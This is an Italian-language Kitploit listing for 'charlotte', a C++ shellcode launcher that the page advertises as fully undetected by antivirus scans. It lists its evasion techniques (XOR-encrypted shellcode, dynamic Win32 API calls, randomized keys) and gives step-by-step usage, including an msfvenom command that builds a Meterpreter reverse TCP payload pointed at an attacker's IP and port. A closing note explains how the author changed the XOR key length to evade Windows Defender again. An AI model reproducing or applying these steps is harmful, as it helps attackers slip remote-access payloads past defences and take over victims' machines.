Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
charlotte — c++ lanciatore di shellcode completamente non rilevato ;) | Kitploit
Strumenti/GitHubGitHub/9emin1/charlotte
ExploitEvasione IDS/IPSShellcodeAnalisi MalwarePenetration TestingRed TeamingGenerazione di ShellcodeSviluppo PayloadAnti-Bot
GitHub9emin1/charlotte

charlotte

c++ lanciatore di shellcode completamente non rilevato ;)

9762075 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

charlotte

c++ shellcode launcher completamente non rilevato ;)

rilasciato per celebrare la nascita del mio neonato

descrizione

13/05/2021:

  1. shellcode launcher in c++, completamente non rilevato 0/26 al 13 maggio 2021.
  2. invocazione dinamica delle funzioni API win32
  3. crittografia XOR dello shellcode e dei nomi delle funzioni
  4. chiavi XOR e variabili randomizzate per esecuzione
  5. su Kali Linux, basta 'apt-get install mingw-w64*' e tutto qui!

17/05/2021:

  1. lunghezza casuale delle stringhe e delle chiavi XOR

antiscan.me

alt_text

utilizzo

clonare il repository, generare il file dello shellcode con nome beacon.bin, ed eseguire charlotte.py

esempio:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profitto

testato con msfvenom -p (mostrato nel .gif POC qui sotto) e anche payload in formato raw di cobalt strike

alt_text

aggiornamento v1.1

17/05/21:

apparentemente Microsoft Windows Defender è stato in grado di rilevare il binario .DLL,

e come lo hanno rilevato? cercando diverse chiavi XOR di dimensione 16 byte

cambiandola a 9 come mostrato nel .gif POC qui sotto si vede che ora è di nuovo non rilevato

saluti!

alt_text

Scarica lo strumento